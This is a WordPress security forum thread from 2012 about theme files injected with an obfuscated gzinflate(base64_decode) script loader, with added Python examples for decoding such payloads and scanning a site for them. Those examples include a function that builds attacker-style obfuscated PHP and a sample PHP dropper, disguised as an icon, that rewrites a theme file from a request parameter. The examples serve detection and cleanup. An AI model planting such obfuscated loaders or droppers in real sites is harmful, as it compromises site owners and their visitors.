New Wordpress Hack?

1:22 am on Apr 15, 2012 (gmt 0)

Administrator

WebmasterWorld Administrator rogerd is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Aug 2, 2000
posts:9685
votes: 0


A blog I admin triggered a "Trojan.Malscript.html" warning when I loaded its home page with Norton running. I immediately checked Google Webmaster Tools and a number of web-scanners like AVG and others. They all gave the site a clean bill of health. It was still causing Norton to go off, so I looked at the source code.

I found a link to a javascript file hosted on an Australian "organicfoodmarkets" domain. Digging into the theme files, I found that some had been modified to include a line of code that included "gzinflate(base64_decode" followed by a long string. This was translated into the bogus script load code when the page was displayed.

The odd thing was that the files had apparently been modified over a month earlier, and GWT, along with everyone else, didn't catch it. Another machine running TrendMicro let me load the page without objection.

I think this was most likely a server side hack, i.e., via compromised FTP or Wordpress login, vs. some kind of code vulnerability.

So, it's a good idea to keep your eye on file dates and, of course, exercise normal security precautions for logins and passwords. Had it not been for Norton, this might have persisted a lot longer without my knowing it. Checking your files for the base64 code above would disclose an identical exploit, though if the hacker has FTP access any number of nasty things could be done.
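To show what the "gzinflate(base64_decode" line found in the theme files actually does, here is an added example; it is not code from the thread or from any poster. It builds the same kind of PHP one-liner from a plain echo of a script tag, then decodes it back offline without executing anything. The script URL is an invented placeholder (the thread does not give the real one), and the layer-peeling loop is an assumption about how such payloads are commonly nested. PHP's gzinflate() is raw DEFLATE, which is zlib with wbits = -15.

```python
"""Added example: how eval(gzinflate(base64_decode('...'))) hides a script tag,
and how to decode such a blob without running it. Not from the original thread."""
import base64
import re
import zlib

# Constructed stand-in for the code the attacker wants executed at render time.
# example.invalid is a placeholder; the thread does not give the real domain.
PAYLOAD_PHP = "echo '<script src=\"http://example.invalid/js/stat.js\"></script>';"

# gzinflate(base64_decode('...')) with a base64 blob; this is the signature to grep for.
PATTERN = re.compile(
    r"gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]"
)


def obfuscate(plaintext: str) -> str:
    """Produce the attacker-style one-liner: PHP's gzdeflate() is raw DEFLATE,
    which is zlib with negative window bits, then base64 on top."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    raw = co.compress(plaintext.encode()) + co.flush()
    b64 = base64.b64encode(raw).decode()
    return f"<?php eval(gzinflate(base64_decode('{b64}'))); ?>"


def decode_payloads(php_source: str) -> list:
    """Return what every gzinflate(base64_decode('...')) blob in php_source decodes
    to. Decode only: nothing is eval'd. Undecodable blobs are reported, not skipped."""
    out = []
    for m in PATTERN.finditer(php_source):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            out.append(zlib.decompress(raw, -15).decode(errors="replace"))
        except (ValueError, zlib.error) as exc:
            out.append(f"<undecodable blob: {exc}>")
    return out


def peel(php_source: str, max_layers: int = 10) -> list:
    """Attackers often wrap the one-liner in itself several times (assumption:
    not stated in the thread). Keep decoding until no signature remains and
    return every layer, innermost last."""
    layers = []
    current = php_source
    for _ in range(max_layers):
        decoded = decode_payloads(current)
        if not decoded:
            break
        current = "\n".join(decoded)
        layers.append(current)
    return layers


if __name__ == "__main__":
    injected = obfuscate(obfuscate(PAYLOAD_PHP))  # two layers, as often seen
    print("what the theme file would contain:\n ", injected[:80], "...")
    for i, layer in enumerate(peel(injected), 1):
        print(f"layer {i}:", layer)
```

Running the decoder against a suspect theme file (read its contents and pass them to peel) shows the script-load line that only appears in the rendered page, which is why scanners that look at the PHP source for a known URL, or at the served HTML on a day the payload is dormant, can miss it.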
2:02 am on Apr 15, 2012 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lorax is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Mar 31, 2002
posts:7575
votes: 0


Thanks for the info rogerd. I haven't come across this personally but will be looking out for it now.
2:17 am on Apr 15, 2012 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14624
votes: 88


I think this was most likely a server side hack, i.e., via compromised FTP or Wordpress login, vs. some kind of code vulnerability.


Probably got in via Wordpress would be my guess as it's always responsible for some vulnerability somewhere, or even your hosted control panel as there have been some recent vulnerabilities in those as well.

However, if you're on shared hosting, they could've gotten in on any account and escalated privileges and performed that little trick server wide.
5:16 pm on Apr 16, 2012 (gmt 0)

Administrator

WebmasterWorld Administrator rogerd is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Aug 2, 2000
posts:9685
votes: 0


The intrusion seems to be confined to a single domain on that VPS. I had some work done on the site a few days before the files changed, and I'm guessing that there was some vulnerability on the coder's end. Even if he wasn't the source, he may have been hacked himself, had his login compromised, etc.

I deleted the coder's credentials once the work was complete and stable, but the intrusion (whether related or not) happened before that deletion.

Could be a coincidence, of course, and I don't rule out other possible hacks.
11:07 am on May 2, 2012 (gmt 0)

New User

joined:May 2, 2012
posts:1
votes: 0


I have a website, I was using WordPress, but now I have no website because my website was hacked...
6:37 am on May 3, 2012 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Feb 16, 2004
posts:1341
votes: 0


Some more info about base64_decode hacks here-
[webmasterworld.com...]

The one I found on a shared hosting server had a "double secret" key file hidden with a non obvious file extension -- any time the corrupted file was deleted, the second file would replicate it.

Grep is your friend...
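As an added example in the spirit of "grep is your friend", and not code from the thread or any poster, the following scanner builds a constructed WordPress-like tree in a temporary directory and flags the three things the posts above say to look for: the gzinflate(base64_decode signature in theme files, files modified after a date you trust, and a PHP "key file" hidden under an extension that should not contain code (the replicating second file described in the previous post). All file names, contents, the dummy base64 blob and the timestamps are made up.

```python
"""Added example: a small scanner for the three indicators discussed in the thread.
Not from the original thread; the sample tree is constructed for the demo."""
import os
import re
import tempfile
from pathlib import Path

# Obfuscation families seen in injected theme files (the thread names the first).
SIGNATURES = {
    "gzinflate-base64": re.compile(rb"gzinflate\s*\(\s*base64_decode\s*\("),
    "eval-decoder": re.compile(rb"eval\s*\(\s*(?:base64_decode|str_rot13|gzuncompress)\s*\("),
}
CODE_EXTS = {".php", ".phtml", ".inc"}      # extensions that legitimately hold PHP
PHP_TAG = re.compile(rb"<\?php\b|<\?=")     # PHP open tag anywhere in a file


def scan_tree(root, trusted_before_epoch):
    """Return sorted (reason, relative_path) tuples for every suspicious file under root."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        for name, sig in SIGNATURES.items():
            if sig.search(data):
                findings.append((f"signature:{name}", rel))
        # PHP code hiding under an icon/image/other extension: the "double secret" file.
        if path.suffix.lower() not in CODE_EXTS and PHP_TAG.search(data):
            findings.append(("php-in-non-code-file", rel))
        # Anything touched after the last date you know the site was clean.
        if path.stat().st_mtime > trusted_before_epoch:
            findings.append(("modified-after-baseline", rel))
    return sorted(findings)


# Constructed sample tree with fixed timestamps so the result is deterministic.
OLD_MTIME = 1325376000   # 2012-01-01 00:00 UTC: long before the incident
NEW_MTIME = 1331856000   # 2012-03-16 00:00 UTC: inside the suspicious window
BASELINE = 1330560000    # 2012-03-01 00:00 UTC: last date the admin trusts

SAMPLE_FILES = {
    "wp-includes/version.php": (b"<?php\n$wp_version = '3.3.1';\n", OLD_MTIME),
    "wp-content/themes/twentyeleven/header.php": (b"<?php wp_head(); ?>\n<body>\n", OLD_MTIME),
    # Injected footer: 'QUJD' is a dummy blob, not a real payload.
    "wp-content/themes/twentyeleven/footer.php": (
        b"<?php wp_footer(); ?>\n"
        b"<?php eval(gzinflate(base64_decode('QUJD'))); ?>\n"
        b"</body></html>\n",
        NEW_MTIME,
    ),
    # Hypothetical dropper saved as an "icon" that can re-create the injected file.
    "wp-content/uploads/2012/03/favicon.ico": (
        b"<?php if (isset($_GET['k'])) { file_put_contents("
        b"'../../themes/twentyeleven/footer.php', base64_decode($_GET['k'])); } ?>",
        NEW_MTIME,
    ),
}


def build_sample_tree(root):
    """Write SAMPLE_FILES under root and pin each file's mtime."""
    for rel, (content, mtime) in SAMPLE_FILES.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(content)
        os.utime(path, (mtime, mtime))


def demo():
    """Build the constructed tree, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp, BASELINE)


if __name__ == "__main__":
    for reason, rel in demo():
        print(f"{reason:28s} {rel}")
```

On a real host the same checks are one-liners with GNU grep and find: `grep -rl 'gzinflate(base64_decode' wp-content/` for the signature, `find . -type f -newermt '2012-03-01'` for files touched after a trusted date, and `grep -rl '<?php' --include='*.ico' --include='*.jpg' --include='*.png' .` for code under image extensions. Run them from a copy of the site taken before you start deleting things, because, as the post above notes, removing the visible file can trigger the hidden one to put it back.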